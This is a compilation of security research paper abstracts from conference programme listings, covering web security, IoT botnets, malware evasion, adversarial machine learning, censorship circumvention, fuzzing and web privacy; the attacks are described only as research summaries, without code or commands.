Session 10: Social Networks and Anonymity

Investigating Ad Transparency Mechanisms in Social Media: A Case Study of Facebooks Explanations

Targeted advertising has been subject to many privacy complaints from both users and policy makers. Despite this attention, users still have little understanding of what data the advertising platforms have about them and why they are shown particular ads. To address such concerns, Facebook recently introduced two transparency mechanisms: a “Why am I seeing this?” button that provides users with an explanation of why they were shown a particular ad (ad explanations), and an Ad Preferences Page that provides users with a list of attributes Facebook has inferred about them and how (data explanations). In this paper, we investigate the level of transparency provided by these two mechanisms. We first define a number of key properties of explanations and then evaluate empirically whether Facebook’s explanations satisfy them. For our experiments, we develop a browser extension that collects the ads users receive every time they browse Facebook, their respective explanations, and the attributes listed on the Ad Preferences Page; we then use controlled experiments where we create our own ad campaigns and target the users that installed our extension. Our results show that ad explanations are often incomplete and sometimes misleading while data explanations are often incomplete and vague. Taken together, our findings have significant implications for users, policy makers, and regulators as social media advertising services mature.

Inside Job: Applying Traffic Analysis to Measure Tor from Within

In this paper, we explore traffic analysis attacks on Tor that are conducted solely with middle relays rather than with relays from the entry or exit positions. We create a methodology to apply novel Tor circuit and website fingerprinting from middle relays to detect onion service usage; that is, we are able to identify websites with hidden network addresses by their traffic patterns. We also carry out the first privacypreserving popularity measurement of a single social networking website hosted as an onion service by deploying our novel circuit and website fingerprinting techniques in the wild. Our results show: (i) that the middle position enables wide-scale monitoring and measurement not possible from a comparable resource deployment in other relay positions, (ii) that traffic fingerprinting techniques are as effective from the middle relay position as prior works show from a guard relay, and (iii) that an adversary can use our fingerprinting methodology to discover the popularity of onion services, or as a filter to target specific nodes in the network, such as particular guard relays.

Smoke Screener or Straight Shooter: Detecting Elite Sybil Attacks in User-Review Social Networks

Popular User-Review Social Networks (URSNs)— such as Dianping, Yelp, and Amazon—are often the targets of reputation attacks in which fake reviews are posted in order to boost or diminish the ratings of listed products and services. These attacks often emanate from a collection of accounts, called Sybils, which are collectively managed by a group of real users. A new advanced scheme, which we term elite Sybil attacks, recruits organically highly-rated accounts to generate seeminglytrustworthy and realistic-looking reviews. These elite Sybil accounts taken together form a large-scale sparsely-knit Sybil network for which existing Sybil fake-review defense systems are unlikely to succeed. In this paper, we conduct the first study to define, characterize, and detect elite Sybil attacks. We show that contemporary elite Sybil attacks have a hybrid architecture, with the first tier recruiting elite Sybil workers and distributing tasks by Sybil organizers, and with the second tier posting fake reviews for profit by elite Sybil workers. We design ELSIEDET, a three-stage Sybil detection scheme, which first separates out suspicious groups of users, then identifies the campaign windows, and finally identifies elite Sybil users participating in the campaigns. We perform a large-scale empirical study on ten million reviews from Dianping, by far the most popular URSN service in China. Our results show that reviews from elite Sybil users are more spread out temporally, craft more convincing reviews, and have higher filter bypass rates. We also measure the impact of Sybil campaigns on various industries (such as cinemas, hotels, restaurants) as well as chain stores, and demonstrate that monitoring elite Sybil users over time can provide valuable early alerts against Sybil campaigns.

2019 programme dblp

1B: Web Security

Don’t Trust The Locals: Investigating the Prevalence of Persistent Client-Side Cross-Site Scripting in the Wild

The Web has become highly interactive and an important driver for modern life, enabling information retrieval, social exchange, and online shopping. From the security perspective, Cross-Site Scripting (XSS) is one of the most nefarious attacks against Web clients. Research has long since focused on three categories of XSS: Reflected, Persistent, and DOM-based XSS. In this paper, we argue that our community must consider at least four important classes of XSS, and present the first systematic study of the threat of Persistent Client-Side XSS, caused by the insecure use of client-side storage. While the existence of this class has been acknowledged, especially by the non-academic community like OWASP, prior works have either only found such flaws as side effects of other analyses or focused on a limited set of applications to analyze. Therefore, the community lacks in-depth knowledge about the actual prevalence of Persistent Client-Side XSS in the wild.

To close this research gap, we leverage taint tracking to identify suspicious flows from client-side persistent storage (Web Storage, cookies) to dangerous sinks (HTML, JavaScript, and script.src).
We discuss two attacker models capable of injecting malicious payloads into storage, i.e., a Network Attacker capable of temporarily hijacking HTTP communication (e.g., in a public WiFi), and a Web Attacker who can leverage flows into storage or an existing reflected XSS flaw to persist their payload. With our taint-aware browser and these models in mind, we study the prevalence of Persistent Client-Side XSS in the Alexa Top 5,000 domains.
We find that more than 8% of them have unfiltered data flows from persistent storage to a dangerous sink, which showcases the developers’ inherent trust in the integrity of storage content. Even worse, if we only consider sites that make use of data originating from storage, 21% of the sites are vulnerable. For those sites with vulnerable flows from storage to sink, we find that at least 70% are directly exploitable by our attacker models. Finally, investigating the vulnerable flows originating from storage allows us to categorize them into four disjoint categories and propose appropriate mitigations.

Master of Web Puppets: Abusing Web Browsers for Persistent and Stealthy Computation

The proliferation of web applications has essentially transformed modern browsers into small but powerful operating systems. Upon visiting a website, user devices run implicitly trusted script code, the execution of which is confined within the browser to prevent any interference with the user’s system. Recent JavaScript APIs, however, provide advanced capabilities that not only enable feature-rich web applications, but also allow attackers to perform malicious operations despite the confined nature of JavaScript code execution.
In this paper, we demonstrate the powerful capabilities that modern browser APIs provide to attackers by presenting MarioNet: a framework that allows a remote malicious entity to control a visitor’s browser and abuse its resources for unwanted computation or harmful operations, such as cryptocurrency mining, password-cracking, and DDoS. MarioNet relies solely on already available HTML5 APIs, without requiring the installation of any additional software. In contrast to previous browser- based botnets, the persistence and stealthiness characteristics of MarioNet allow the malicious computations to continue in the background of the browser even after the user closes the window or tab of the initially visited malicious website. We present the design, implementation, and evaluation of our prototype system, which is compatible with all major browsers, and discuss potential defense strategies to counter the threat of such persistent in- browser attacks. Our main goal is to raise awareness about this new class of attacks, and inform the design of future browser APIs so that they provide a more secure client-side environment for web applications.

Tranco: A Research-Oriented Top Sites Ranking Hardened Against Manipulation

In order to evaluate the prevalence of security and privacy practices on a representative sample of the Web, researchers rely on website popularity rankings such as the Alexa list. While the validity and representativeness of these rankings are rarely questioned, our findings show the contrary: we show for four main rankings how their inherent properties (similarity, stability, representativeness, responsiveness and benignness) affect their composition and therefore potentially skew the conclusions made in studies. Moreover, we find that it is trivial for an adversary to manipulate the composition of these lists. We are the first to empirically validate that the ranks of domains in each of the lists are easily altered, in the case of Alexa through as little as a single HTTP request. This allows adversaries to manipulate rankings on a large scale and insert malicious domains into whitelists or bend the outcome of research studies to their will. To overcome the limitations of such rankings, we propose improvements to reduce the fluctuations in list composition and guarantee better defenses against manipulation. To allow the research community to work with reliable and reproducible rankings, we provide Tranco, an improved ranking that we offer through an online service available at https://tranco-list.eu.

JavaScript Template Attacks: Automatically Inferring Host Information for Targeted Exploits

Today, more and more web browsers and extensions provide anonymity features to hide user details. Primarily used to evade tracking by websites and advertisements, these features are also used by criminals to prevent identification. Thus, not only tracking companies but also law-enforcement agencies have an interest in finding flaws which break these anonymity features. For instance, for targeted exploitation using zero days, it is essential to have as much information about the target as possible. A failed exploitation attempt, e.g., due to a wrongly guessed operating system, can burn the zero-day, effectively costing the attacker money. Also for side-channel attacks, it is of the utmost importance to know certain aspects of the victim’s hardware configuration, e.g., the instruction-set architecture. Moreover, knowledge about specific environmental properties, such as the operating system, allows crafting more plausible dialogues for phishing attacks.

In this paper, we present a fully automated approach to find subtle differences in browser engines caused by the environment. Furthermore, we present two new side-channel attacks on browser engines to detect the instruction-set architecture and the used memory allocator. Using these differences, we can deduce information about the system, both about the software as well as the hardware. As a result, we cannot only ease the creation of fingerprints, but we gain the advantage of having a more precise picture for targeted exploitation. Our approach allows automating the cumbersome manual search for such differences. We collect all data available to the JavaScript engine and build templates from these properties. If a property of such a template stays the same on one system but differs on a different system, we found an environment-dependent property.

We found environment-dependent properties in Firefox, Chrome, Edge, and mobile Tor, allowing us to reveal the underlying operating system, CPU architecture, used privacy-enhancing plugins, as well as exact browser version. We stress that our method should be used in the development of browsers and privacy extensions to automatically find flaws in the implementation.

Latex Gloves: Protecting Browser Extensions from Probing and Revelation Attacks

Browser extensions enable rich experience for the users of today’s web. Being deployed with elevated privileges, extensions are given the power to overrule web pages. As a result, web pages often seek to detect the installed extensions, sometimes for benign adoption of their behavior but sometimes as part of privacy-violating user fingerprinting. Researchers have studied a class of attacks that allow detecting extensions by probing for Web Accessible Resources (WARs) via URLs that include public extension IDs. Realizing privacy risks associated with WARs, Firefox has recently moved to randomize a browser extension’s ID, prompting the Chrome team to plan for following the same path. However, rather than mitigating the issue, the randomized IDs can in fact exacerbate the extension detection problem, enabling attackers to use a randomized ID as a reliable fingerprint of a user. We study a class of extension revelation attacks, where extensions reveal themselves by injecting their code on web pages. We demonstrate how a combination of revelation and probing can uniquely identify 90% out of all extensions injecting content, in spite of a randomization scheme. We perform a series of large-scale studies to estimate possible implications of both classes of attacks. As a countermeasure, we propose a browser-based mechanism that enables control over which extensions are loaded on which web pages and present a proof of concept implementation which blocks both classes of attacks.

maTLS: How to Make TLS middlebox-aware?

Middleboxes (MBs) are widely deployed in order to enhance security and performance in networking.
However, as the communications over the TLS become increasingly common, the end-to-end channel model of the TLS undermines the efficacy of MBs.
Existing solutions, such as `split TLS’ that intercepts TLS sessions, often introduce significant security risks by installing a custom root certificate or sharing a private key.
Many studies have confirmed the vulnerabilities of combining the TLS with MBs, which include certificate validation failures, unwanted content modification, and using obsolete ciphersuites.
To address the above issues, we introduce an MB-aware TLS protocol, dubbed maTLS, that allows MBs to participate in the TLS in a visible and accountable fashion.
Every participating MB now splits a session into two segments with its own security parameters in collaboration with the two endpoints.
However, the session is still secure as the maTLS protocol is designed to achieve the authentication of MBs, the audit of MBs’ operations, and the verification of security parameters of segments.
We carry out testbed-based experiments to show that maTLS achieves the above security goals with marginal overhead.
We also prove the security model of maTLS by using Tamarin, a security verification tool.

2B: Malware and Threats

Cracking the Wall of Confinement: Understanding and Analyzing Malicious Domain Take-downs

Take-down operations aim to disrupt cybercrime involving malicious domains. In the past decade, many successful take-down operations have been reported, including those against the Conficker worm, and most recently, against VPNFilter. Although it plays an important role in fighting cybercrime, the domain take-down procedure is still surprisingly opaque. There seems to be no in-depth understanding about how the take-down operation works and whether there is due diligence to ensure its security and reliability.

In this paper, we report the first systematic study on domain takedown. Our study was made possible via a large collection of data, including various sinkhole feeds and blacklists, passive DNS data spanning six years, and historical Whois information. Over these datasets, we built a unique methodology that extensively used various reverse lookups and other data analysis techniques to address the challenges in identifying taken-down domains, sinkhole operators, and take-down durations. Applying the methodology on the data, we discovered over 620K taken-down domains and conducted a longitudinal analysis on the take-down process, thus facilitating a better understanding of the operation and its weaknesses. We found that more than 14% of domains taken-down over the past ten months have been released back to the domain market and that some of the released domains have been repurchased by the malicious actor again before being captured and seized, either by the same or different sinkholes. In addition, we showed that the misconfiguration of DNS records corresponding to the sinkholed domains allowed us to hijack a domain that was seized by the FBI. Further, we found that expired sinkholes have caused the transfer of around 30K taken-down domains whose traffic is now under the control of new owners.

Cleaning Up the Internet of Evil Things: Real-World Evidence on ISP and Consumer Efforts to Remove Mirai

With the rise of IoT botnets, the remediation of infected devices has become a critical task. As over 87% of these devices reside in broadband networks, this task will fall primarily to consumers and the Internet Service Providers. We present the first empirical study of IoT malware cleanup in the wild – more specifically, of removing Mirai infections in the network of a medium-sized ISP. To measure remediation rates, we combine data from an observational study and a randomized controlled trial involving 220 consumers who suffered a Mirai infection together with data from honeypots and darknets. We find that quarantining and notifying infected customers via a walled garden, a best practice from ISP botnet mitigation for conventional malware, remediates 92% of the infections within 14 days. Email-only notifications have no observable impact compared to a control group where no notifications were sent. We also measure surprisingly high natural remediation rates of 58-74% for this control group and for two reference networks where users were also not notified. Even more surprising, reinfection rates are low. Only 5% of the customers who remediated suffered another infection in the five months after our first study. This stands in contrast to our lab tests, which observed reinfection of real IoT devices within minutes – a discrepancy for which we explore various different possible explanations, but find no satisfactory answer. We gather data on customer experiences and actions via 76 phone interviews and the communications logs of the ISP. Remediation succeeds even though many users are operating from the wrong mental model – e.g., they run anti-virus software on their PC to solve the infection of an IoT device. While quarantining infected devices is clearly highly effective, future work will have to resolve several remaining mysteries. Furthermore, it will be hard to scale up the walled garden solution because of the weak incentives of the ISPs.

Measurement and Analysis of Hajime, a Peer-to-peer IoT Botnet

The Internet of Things (IoT) introduces an unprecedented diversity and ubiquity to networked computing. It also introduces new attack surfaces that are a boon to attackers. The recent Mirai botnet showed the potential and power of a collection of compromised IoT devices. A new botnet, known as Hajime, targets many of the same devices as Mirai, but differs considerably in its design and operation. Hajime uses a public peer-to-peer system as its command and control infrastructure, and regularly introduces new exploits, thereby increasing its resilience.

We show that Hajime’s distributed design makes it a valuable tool for better understanding IoT botnets. For instance, Hajime cleanly separates its bots into different peer groups depending on their underlying hardware architecture. Through detailed measurement—active scanning of Hajime’s peer-to-peer infrastructure and passive, longitudinal collection of root DNS backscatter traffic—we show that Hajime can be used as a lens into how IoT botnets operate, what kinds of devices they compromise, and what countries are more (or less) susceptible. Our results show that there are more compromised IoT devices than previously reported; that these devices use an assortment of CPU architectures, the popularity of which varies widely by country; that churn is high among IoT devices; and that new exploits can quickly and drastically increase the size and power of IoT botnets. Our code and data are available to assist future efforts to measure and mitigate the growing threat of IoT botnets.

Countering Malicious Processes with Process-DNS Association

Modern malware and cyber attacks depend heavily on DNS services to make their campaigns reliable and difficult to track. Monitoring network DNS activities and blocking suspicious domains have been proven an effective technique in countering such attacks. However, recent successful campaigns reveal that at- tackers adapt by using seemingly benign domains and public web storage services to hide malicious activity. Also, the recent support for encrypted DNS queries provides attacker easier means to hide malicious traffic from network-based DNS monitoring.

We propose PDNS, an end-point DNS monitoring system based on DNS sensor deployed at each host in a network, along with a centralized backend analysis server. To detect such attacks, PDNS expands the monitored DNS activity context and examines process context which triggered that activity. Specifically, each deployed PDNS sensor matches domain name and the IP address related to the DNS query with process ID, binary signature, loaded DLLs, and code signing information of the program that initiated it. We evaluate PDNS on a DNS activity dataset collected from 126 enterprise hosts and with data from multiple malware sources. Using ML Classifiers including DNN, our results outperform most previous works with high detection accuracy: a true positive rate at 98.55% and a low false positive rate at 0.03%.

ExSpectre: Hiding Malware in Speculative Execution

Recently, the Spectre and Meltdown attacks revealed serious vulnerabilities in modern CPU designs, allowing an attacker to exfiltrate data from sensitive programs. These vulnerabilities take advantage of speculative execution to coerce a processor to perform computation that would otherwise not occur, leaking the resulting information via side channels to an attacker.

In this paper, we extend these ideas in a different direction, and leverage speculative execution in order to hide malware from both static and dynamic analysis. Using this technique, critical portions of a malicious program’s computation can be shielded from view, such that even a debugger following an instruction-level trace of the program cannot tell how its results were computed.

We introduce ExSpectre, which compiles arbitrary malicious code into a seemingly-benign payload binary. When a separate trigger program runs on the same machine, it mistrains the CPU’s branch predictor, causing the payload program to speculatively execute its malicious payload, which communicates speculative results back to the rest of the payload program to change its real-world behavior.

We study the extent and types of execution that can be performed speculatively, and demonstrate several computations that can be performed covertly. In particular, within speculative execution we are able to decrypt memory using AES-NI instructions at over 11 kbps. Building on this, we decrypt and interpret a custom virtual machine language to perform arbitrary computation and system calls in the real world. We demonstrate this with a proof-of-concept dial back shell, which takes only a few milliseconds to execute after the trigger is issued. We also show how our corresponding trigger program can be a pre-existing benign application already running on the system, and demonstrate this concept with OpenSSL driven remotely by the attacker as a trigger program.

ExSpectre demonstrates a new kind of malware that evades existing reverse engineering and binary analysis techniques. Because its true functionality is contained in seemingly unreachable dead code, and its control flow driven externally by potentially any other program running at the same time, ExSpectre poses a novel threat to state-of-the-art malware analysis techniques.

3A: Adversarial Machine Learning

ML-Leaks: Model and Data Independent Membership Inference Attacks and Defenses on Machine Learning Models

Machine learning (ML) has become a core component of many real-world applications and training data is a key factor that drives current progress. This huge success has led Internet companies to deploy machine learning as a service (MLaaS). Recently, the first membership inference attack has shown that extraction of information on the training set is possible in such MLaaS settings, which has severe security and privacy implications.

However, the early demonstrations of the feasibility of such attacks have many assumptions on the adversary, such as using multiple so-called shadow models, knowledge of the target model structure, and having a dataset from the same distribution as the target model’s training data. We relax all these key assumptions, thereby showing that such attacks are very broadly applicable at low cost and thereby pose a more severe risk than previously thought. We present the most comprehensive study so far on this emerging and developing threat using eight diverse datasets which show the viability of the proposed attacks across domains.

In addition, we propose the first effective defense mechanisms against such broader class of membership inference attacks that maintain a high level of utility of the ML model.

MBeacon: Privacy-Preserving Beacons for DNA Methylation Data

The advancement of molecular profiling techniques fuels biomedical research with a deluge of data. To facilitate data sharing, the Global Alliance for Genomics and Health established the Beacon system, a search engine designed to help researchers find datasets of interest. While the current Beacon system only supports genomic data, other types of biomedical data, such as DNA methylation, are also essential for advancing our understanding in the field. In this paper, we propose the first Beacon system for DNA methylation data sharing: MBeacon. As the current genomic Beacon is vulnerable to privacy attacks, such as membership inference, and DNA methylation data is highly sensitive, we take a privacy-by-design approach to construct MBeacon. First, we demonstrate the privacy threat, by proposing a membership inference attack tailored specifically to unprotected methylation Beacons. Our experimental results show that 100 queries are sufficient to achieve a successful attack with AUC (area under the ROC curve) above 0.9. To remedy this situation, we propose a novel differential privacy mechanism, namely SVT^2, which is the core component of MBeacon. Extensive experiments over multiple datasets show that SVT^2 can successfully mitigate membership privacy risks without significantly harming utility. We further implement a fully functional prototype of MBeacon which we make available to the research community.

Stealthy Adversarial Perturbations Against Real-Time Video Classification Systems

Recent research has demonstrated the brittleness of machine learning systems to adversarial perturbations. However, the studies have been mostly limited to perturbations on images and more generally, classification tasks that do not deal with real-time stream inputs. In this paper we ask ”Are adversarial perturbations that cause misclassification in real-time video classification systems possible, and if so what properties must they satisfy?” Real-time video classification systems find application in surveillance applications, smart vehicles, and smart elderly care and thus, misclassification could be particularly harmful (e.g., a mishap at an elderly care facility may be missed). Video classification systems take video clips as inputs and these clip boundaries are not deterministic. We show that perturbations that do not take “the indeterminism in the clip boundaries input to the video classifier” into account, do not achieve high attack success rates. We propose novel approaches for generating 3D adversarial perturbations (perturbation clips) that exploit recent advances in generative models to not only overcome this key challenge but also provide stealth. In particular, our most potent 3D adversarial perturbations cause targeted activities in video streams to be misclassified with rates over 80%. At the same time, they also ensure that the perturbations leave other (untargeted) activities largely unaffected making them extremely stealthy. Finally, we also derive a single-frame (2D) perturbation that can be applied to every frame in a video stream, and which in many cases, achieves extremely high misclassification rates.

NIC: Detecting Adversarial Samples with Neural Network Invariant Checking

Deep Neural Networks (DNN) are vulnerable to adversarial samples that are generated by perturbing correctly classified inputs to cause DNN models to misbehave (e.g., misclassification). This can potentially lead to disastrous consequences especially in security-sensitive applications. Existing defense and detection techniques work well for specific attacks under various assumptions (e.g., the set of possible attacks are known beforehand). However, they are not sufficiently general to protect against a broader range of attacks. In this paper, we analyze the internals of DNN models under various attacks and identify two common exploitation channels: the provenance channel and he activation value distribution channel. We then propose a novel technique to extract DNN invariants and use them to perform runtime adversarial sample detection. Our experimental results of 11 different kinds of attacks on popular datasets including ImageNet and 13 models show that our technique can effectively detect all these attacks (over 90% accuracy) with limited false positives. We also compare it with three state-of-the-art techniques including the Local Intrinsic Dimensionality (LID) based method, denoiser based methods (i.e., MagNet and HGD), and the prediction inconsistency based approach (i.e., feature squeezing). Our experiments show promising results.

TextBugger: Generating Adversarial Text Against Real-world Applications

Deep Learning-based Text Understanding (DLTU) is the backbone technique behind various applications, including question answering, machine translation, and text classification. Despite its tremendous popularity, the security vulnerabilities of DLTU are still largely unknown, which is highly concerning given its increasing use in security-sensitive applications such as user sentiment analysis and toxic content detection. In this paper, we show that DLTU is inherently vulnerable to adversarial text attacks, in which maliciously crafted text triggers target DLTU systems and services to misbehave. Specifically, we present TextBugger, a general attack framework for generating adversarial text. In contrast of prior work, TextBugger differs in significant ways: (i) effective – it outperforms state-of-the-art attacks in terms of attack success rate; (ii) evasive – it preserves the utility of benign text, with 94.9% of the adversarial text correctly recognized by human readers; and (iii) efficient – it generates adversarial text with computational complexity sub-linear to the text length. We empirically evaluate TextBugger on a set of real-world DLTU systems and services used for sentiment analysis and toxic content detection, demonstrating its effectiveness, evasiveness, and efficiency. For instance, TextBugger achieves 100% success rate on the IMDB dataset based on Amazon AWS Comprehend within 4.61 seconds and preserves 97% semantic similarity. We further discuss possible defense mechanisms to mitigate such attack and the adversary’s potential countermeasures, which leads to promising directions for further research.

3B-2: Censorship

The use of TLS in Censorship Circumvention

TLS, the Transport Layer Security protocol, has quickly become the most popular protocol on the Internet, already used to load over 70% of web pages in Mozilla Firefox. Due to its ubiquity, TLS is also a popular protocol for censorship circumvention tools, including Tor and Signal, among others.

However, the wide range of features supported in TLS makes it possible to distinguish implementations from one another by what set of cipher suites, elliptic curves, signature algorithms, and other extensions they support. Already, censors have used deep packet inspection (DPI) to identify and block popular circumvention tools based on the fingerprint of their TLS implementation.

In response, many circumvention tools have attempted to mimic popular TLS implementations such as browsers, but this technique has several challenges. First, it is burdensome to keep up with the rapidly-changing browser TLS implementations, and know what fingerprints would be good candidates to mimic. Second, TLS implementations can be difficult to mimic correctly, as they offer many features that may not be supported by the relatively lightweight libraries used in typical circumvention tools. Finally, dependency changes and updates to the underlying libraries can silently impact what an application’s TLS fingerprint looks like, making it difficult for tools to control.

In this paper, we collect and analyze real-world TLS traffic from over 11.8 billion TLS connections over 9 months to identify a wide range of TLS client implementations actually used on the Internet. We use our data to analyze TLS implementations of several popular censorship circumvention tools, including Lantern, Psiphon, Signal, Outline, Tapdance, and Tor (Snowflake and meek). We find that the many of these tools use TLS configurations that are easily distinguishable from the real-world traffic they attempt to mimic, even when these tools have put effort into parroting popular TLS implementations.

To address this problem, we have developed a library, uTLS, that enables tool maintainers to automatically mimic other popular TLS implementations. Using our real-world traffic dataset, we observe many popular TLS implementations we are able to correctly mimic with uTLS, and we describe ways our tool can more flexibly adopt to the dynamic TLS ecosystem with minimal manual effort.

On the Challenges of Geographical Avoidance for Tor

Traffic-analysis attacks are a persisting threat for Tor users. When censors or law enforcement agencies try to identify users, they conduct traffic-confirmation attacks and monitor encrypted transmissions to extract metadata—in combination with routing attacks, these attacks become sufficiently powerful to de-anonymize users. While traffic-analysis attacks are hard to detect and expensive to counter in practice, geographical avoidance provides an option to reject circuits that might be routed through an untrusted area. Unfortunately, recently proposed solutions introduce severe security issues by imprudent design decisions.

In this paper, we approach geographical avoidance starting from a thorough assessment of its challenges. These challenges serve as the foundation for the design of an empirical avoidance concept that considers actual transmission characteristics for justified decisions. Furthermore, we address the problems of untrusted or intransparent ground truth information that hinder a reliable assessment of circuits. Taking these features into account, we conduct an empirical simulation study and compare the performance of our novel avoidance concept with existing
approaches. Our results show that we outperform existing systems by 22 % fewer rejected circuits, which reduces the collateral damage of overly restrictive avoidance decisions. In a second evaluation step, we extend our initial system concept and implement the prototype MultilateraTor. This prototype is the first to satisfy the requirements of a practical deployment, as it maintains Tor’s original level of security, provides reasonable performance, and overcomes the fundamental security flaws of existing systems.

4A: Fuzzing

PeriScope: An Effective Probing and Fuzzing Framework for the Hardware-OS Boundary

The OS kernel is an attractive target for remote attackers. If compromised, the kernel gives adversaries full system access, including the ability to install rootkits, extract sensitive information, and perform other malicious actions, all while evading detection. Most of the kernel’s attack surface is situated along the system call boundary. Ongoing kernel protection efforts have focused primarily on securing this boundary; several capable analysis and fuzzing frameworks have been developed for this purpose.

However, there are additional paths to kernel compromise that do not involve system calls, as demonstrated by several recent exploits. For example, by compromising the firmware of a peripheral device such as a Wi-Fi chipset and subsequently sending malicious inputs from the Wi-Fi chipset to the Wi-Fi driver, adversaries have been able to gain control over the kernel without invoking a single system call. Unfortunately, there are currently no practical probing and fuzzing frameworks that can help developers find and fix such vulnerabilities occurring along the hardware-OS boundary.

We present PeriScope, a Linux kernel based probing framework that enables fine-grained analysis of device-driver interactions. PeriScope hooks into the kernel’s page fault handling mechanism to either passively monitor and log traffic between device drivers and their corresponding hardware, or mutate the data stream on-the-fly using a fuzzing component, PeriFuzz, thus mimicking an active adversarial attack. PeriFuzz accurately models the capabilities of an attacker on peripheral devices, to expose different classes of bugs including, but not limited to, memory corruption bugs and double-fetch bugs. To demonstrate the risk that peripheral devices pose, as well as the value of our framework, we have evaluated PeriFuzz on the Wi-Fi drivers of two popular chipset vendors, where we discovered 15 unique vulnerabilities, 9 of which were previously unknown.

REDQUEEN: Fuzzing with Input-to-State Correspondence

Automated software testing based on fuzzing has experienced a revival in recent years. Especially feedback-driven fuzzing has become well-known for its ability to efficiently perform randomized testing with limited input corpora. Despite a lot of progress, two common problems are magic numbers and (nested) checksums. Computationally expensive methods such as taint tracking and symbolic execution are typically used to overcome such roadblocks. Unfortunately, such methods often require access to source code, a rather precise description of the environment (e.g., behavior of library calls or the underlying OS), or the exact semantics of the platform’s instruction set.

In this paper, we introduce a lightweight, yet very effective alternative to taint tracking and symbolic execution to facilitate and optimize state-of-the-art feedback fuzzing that easily scales to large binary applications and unknown environments. We observe that during the execution of a given program, parts of the input often end up directly (i.e., nearly unmodified) in the program state. This input-to-state correspondence can be exploited to create a robust method to overcome common fuzzing roadblocks in a highly effective and efficient manner. Our prototype implementation, called REDQUEEN, is able to solve magic bytes and (nested) checksum tests automatically for a given binary executable. Additionally, we show that our techniques outperform various state-of-the-art tools on a wide variety of targets across different privilege levels (kernel-space and userland) with no platform-specific code. REDQUEEN is the first method to find more than 100% of the bugs planted in LAVA-M across all targets. Furthermore, we were able to discover 65 new bugs and obtained 16 CVEs in multiple programs and OS kernel drivers. Finally, our evaluation demonstrates that REDQUEEN is fast, widely applicable and outperforms concurrent approaches by up to three orders of magnitude.

NAUTILUS: Fishing for Deep Bugs with Grammars

Fuzzing is a well-known method for efficiently identifying bugs in programs. Unfortunately, when fuzzing targets that require highly-structured inputs such as interpreters, many fuzzing methods struggle to pass the syntax checks. More specifically, interpreters often process inputs in multiple stages: first syntactic, then semantic correctness is checked. Only if these checks are passed, the interpreted code gets executed. This prevents fuzzers from executing deeper’’ — and hence potentially more interesting — code. Typically two valid inputs that lead to the execution of different features in the target application require too many mutations for simple mutation-based fuzzers to discover: making small changes like bit flips usually only leads to the execution of error paths in the parsing engine. So-called grammar fuzzers are able to pass the syntax checks by using Context-Free Grammars. Using feedback can significantly increase the efficiency of fuzzing engines. Hence, it is commonly used in state-of-the-art mutational fuzzers that do not use grammars. Yet, grammar fuzzers do not make use of code coverage, i.e., they do not know whether any input triggers new functionality or not.

In this paper, we propose NAUTILUS, a method to efficiently fuzz programs that require highly-structured inputs by combining the use of grammars with the use of code coverage feedback. This allows us to recombine aspects of interesting inputs that were learned individually, and to dramatically increase the probability that any generated input will be accepted by the parser. We implemented a proof-of-concept fuzzer that we tested on multiple targets, including ChakraCore (the JavaScript engine of Microsoft Edge), PHP, mruby, and Lua. NAUTILUS identified multiple bugs in all of the targets: Seven in mruby, three in PHP, two in hakraCore, and one in Lua. Reporting these bugs was awarded with a sum of 2600 USD and 6 CVEs were assigned. Our experiments show that combining context-free grammars and feedback-driven fuzzing significantly outperforms state-of-the-art approaches like American Fuzzy Lop (AFL) by an order of magnitude and grammar fuzzers by more than a factor of two when measuring code coverage.

Analyzing Semantic Correctness with Symbolic Execution: A Case Study on PKCS#1 v1.5 Signature Verification

We discuss how symbolic execution can be used to not only find low-level errors but also analyze the semantic correctness of protocol implementations. To avoid manually crafting test cases, we propose a strategy of meta-level search, which leverages constraints stemmed from the input formats to automatically generate concolic test cases. Additionally, to aid root-cause analysis, we develop constraint provenance tracking (CPT), a mechanism that associates atomic sub-formulas of path constraints with their corresponding source level origins. We demonstrate the power of symbolic analysis with a case study on PKCS#1 v1.5 signature verification. Leveraging meta-level search and CPT, we analyzed 15 recent open-source implementations using symbolic execution and found semantic flaws in 6 of them. Further analysis of these flaws showed that 4 implementations are susceptible to new variants of the Bleichenbacher low- exponent RSA signature forgery. One implementation suffers from potential denial of service attacks with purposefully crafted signatures. All our findings have been responsibly shared with the affected vendors. Among the flaws discovered, 6 new CVEs have been assigned to the immediately exploitable ones.

Send Hardest Problems My Way: Probabilistic Path Prioritization for Hybrid Fuzzing

Hybrid fuzzing which combines fuzzing and concolic execution has become an advanced technique for software vulnerability detection. Based on the observation that fuzzing and concolic execution are complementary in nature, the state-of-the-art hybrid fuzzing systems deploy demand launch'' andoptimal switch’’ strategies. Although these ideas sound intriguing, we point out several fundamental limitations in them, due to oversimplified assumptions. We then propose a novel discriminative dispatch’’ strategy to better utilize the capability of concolic execution. We design a novel Monte Carlo based probabilistic path prioritization model to quantify each path’s difficulty and prioritize them for concolic execution. This model treats fuzzing as a random sampling process. It calculates each path’s probability based on the sampling information. Finally, our model prioritizes and assigns the most difficult paths to concolic execution. We implement a prototype system DigFuzz and evaluate our system with two representative datasets. Results show that the concolic execution in DigFuzz outperforms than that in a state-of-the-art hybrid fuzzing system Driller in every major aspect. In particular, the concolic execution in DigFuzz contributes to discovering more vulnerabilities (12 vs. 5) and producing more code coverage (18.9% vs. 3.8%) on the CQE dataset than the concolic execution in Driller.

4B: Privacy on the Web

Measuring the Facebook Advertising Ecosystem

The Facebook advertising platform has been subject to a number of controversies in the past years regarding privacy violations, lack of transparency, as well as its capacity to be used by dishonest actors for discrimination or propaganda. In this study, we aim to provide a better understanding of the Facebook advertising ecosystem, focusing on how it is being used by advertisers. We first analyze the set of advertisers and then investigate how those advertisers are targeting users and customizing ads via the platform. Our analysis is based on the data we collected from over 600 real-world users via a browser extension that collects the ads our users receive when they browse their Facebook timeline, as well as the explanations for why users received these ads.

Our results reveal that users are targeted by a wide range of advertisers (e.g., from popular to niche advertisers); that a non-negligible fraction of advertisers are part of potentially sensitive categories such as news and politics, health or religion; that a significant number of advertisers employ targeting strategies that could be either invasive or opaque; and that many advertisers use a variety of targeting parameters and ad texts. Overall, our work emphasizes the need for better mechanisms to audit ads and advertisers in social media and provides an overview of the platform usage that can help move towards such mechanisms.

We Value Your Privacy … Now Take Some Cookies: Measuring the GDPR’s Impact on Web Privacy

